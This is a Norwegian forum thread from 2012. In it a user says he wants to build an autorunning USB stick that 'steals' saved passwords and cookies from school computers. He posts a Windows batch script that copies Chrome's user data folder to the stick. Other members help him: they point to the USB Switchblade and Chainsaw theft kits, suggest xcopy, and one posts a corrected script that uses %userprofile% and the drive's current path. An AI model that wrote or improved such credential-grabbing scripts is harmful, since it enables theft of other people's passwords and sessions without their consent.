Du må være registrert og logget inn for å kunne legge ut innlegg på freak.no
X
LOGG INN
... eller du kan registrere deg nå
Dette nettstedet er avhengig av annonseinntekter for å holde driften og videre utvikling igang. Vi liker ikke reklame heller, men alternativene er ikke mange. Vær snill å vurder å slå av annonseblokkering, eller å abonnere på en reklamefri utgave av nettstedet.
  9 1003
Hei!

Er det noen her som har erfaring med å fjerne U3 fra en minnepenn og erstatte det med et program man selv har lagd eller noe annet?

Det jeg planlegger å gjøre er å erstatte U3 programmet med mitt eget så mitt skal kunne starte opp automatisk når jeg plugger den i dataen. Noen som har gjort dette før og vet hvordan det fungerer?

Har funnet det programmet her: http://u3.sandisk.com/launchpadremoval.htm men vet ikke om dette bare fjerner U3 og ikke gjør noe annet.

Noen som ahr peil.?
det har gått noen timer på det der ja! (har ikke alle linkene mine på denne pcen)
google på
usb chainsaw
usb switchblade
da vil du få opp mye relevant, så får du bare bytte ut de lugubre programmene med noe snillere om du ønsker det
okei! da skal jeg teste ut det.

men støtte på et problem når jeg skulle lage programmet mitt... her er det jeg har skrevet så langt:
@echo off
title automatisk overforing av filer
echo naa kan du trykke en tast for aa starte
pause
dir c:/brukere/joel1207/appdata/local/google/chrome/userdata/ *. /s /b > e:/chrome
pause
exit

-----
Meningen med dette er at jeg skal kopiere fila med brukerinformasjon(passord, cookies, etc.) og over på minnepennen min. Poenget er liksom å "stjele" lagrede passord og sånt fra en pc da og så erstatte det med brukerdata fra min egen, slika t jeg da får tilgang til passord cookies og sånt.
men når jeg kjører programmet står det: "ingen tilgang". Er det satt opp en sperre for sånt? eller er det noe feil i scriptet?
Noen som har vært borti det?
Måken's Aspirant
Fleff's Avatar
Donor
Du må bruke xcopy funksjonen, så må du endre stien litt også, da brukernavnet blir feil på andre maskiner: %username%/AppData

Men det finnes allerede en god del slurpere til U3 minnepenner, evt andre ulumskheter som har noen fancy payloadere.
Sist endret av Fleff; 4. desember 2012 kl. 20:55.
Okei. Brukernavnet er jeg klar over og har tilgang til brukernavnet til ulike dataer på skolen(ikke vanskelig å finne ut). Skal se litt på xcopy og legger sikkert ut koden etterhvert!

Da har koden blitt slik:

@echo off
title test1
echo start naa
pause
xcopy c:/brukere/joel1207/appdata/local/google/chrome/userdata/*.* /e /k /i /c > e:/chrome
pause
exit
-------
Men det fungerer fremdeles ikke...godt mulig koden er feil, men kommer opp: "ingen tilgang".
hør på fleff, du skaper mye trøbbel ved å bruke hele c filbanen
det samme gjelder e - hva om du putter i usben i en pc der den plutselig får "navnet" f: og ikke e:? da vil det ikke fungerer lengre.
Om .bat ligger på root på minnepennen

Kode

@echo off
title test1
echo start naa
set minnepenn=%cd%
pause
xcopy %userprofile%/appdata/local/google/chrome/userdata/*.* /e /k /i /c > %minnepenn%/chrome
pause
exit
Da vil du unngå kluss med baner..
Sist endret av Lanjelin; 5. desember 2012 kl. 10:43.
takker for svar! skal teste det ut senere!
du vet at du finner opp hjulet på nytt? nå er det helt greit, for det er lærerikt og spennende, men chainsaw/switchblade kommer altså med alle disse funksjonene innebydt - og tar ikke bare userdata fra chrome, men mye mye mer.
ble nevnt tidligere i tråden, men ønsker å gjøre dette for å lære og få erfaring. bedre å gjøre ting selv enn å få fiks ferdig programmer!

Blitt mye fram og tilbake nå...men det kommer fortsatt opp "ingen tilgang". Er det noe å få gjort noe med, eller er det satt til restriksjoner hos windows?